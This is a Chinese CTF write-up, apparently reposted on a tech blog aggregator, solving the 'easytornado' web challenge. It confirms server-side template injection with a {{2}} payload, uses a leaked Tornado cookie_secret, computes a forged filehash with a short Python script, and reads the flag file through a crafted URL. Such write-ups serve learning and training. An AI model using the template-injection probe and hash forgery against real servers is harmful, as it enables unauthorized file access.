IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> Web安全(easytornado) -> 正文阅读

[网络协议]Web安全(easytornado)

打开题目给出的网址,有三个文件,一个挨着一个看。对于第一个flag.txt,按照页面中示例的,可以知道flag在/flllllllllag目录中,并且页面需要填写filehash值,猜测一下为MD5值。

当我们直接在url后面添加/fllllllllllllag,时,网页跳转到下个页面,猜测是模板注入。

验证是否为模板注入,构建msg={{2}}

继续打开welcome.txt

hints.txt:可以看到,页面需要的filehash(MD5)为cookie_secret+md5(filename)。

找出cookie_serect,在博客(模板注入STTI,获取cookie_secret - z9m8r8 - 博客园)介绍了如何通过模板注入找cookie_secret,其值为:58859efd-4f38-4239-937e-9ef640dfa405

按照上文的公式,编写python脚本(本文采用的版本为python3.9),得出想要的值。5035e7a9be96e3c9272ac976f174293e

import hashlib
from hashlib import md5
def md5(s):
    md5 = hashlib.md5()
    md5.update(s)
    return md5.hexdigest()

def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = '58859efd-4f38-4239-937e-9ef640dfa405'
    print(md5(cookie_secret.encode("utf-8")+(md5(filename.encode("utf-8"))).encode("utf-8")))

if __name__ == '__main__':
	filehash()

最终的payload为http://111.200.241.244:52837/file?filename=/fllllllllllllag&filehash=5035e7a9be96e3c9272ac976f174293e

?最终得出flag值flag{3f39aea39db345769397ae895edb9c70}

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-04 15:57:23  更:2022-03-04 15:59:21 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年10日历 -2024/10/5 13:28:42-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码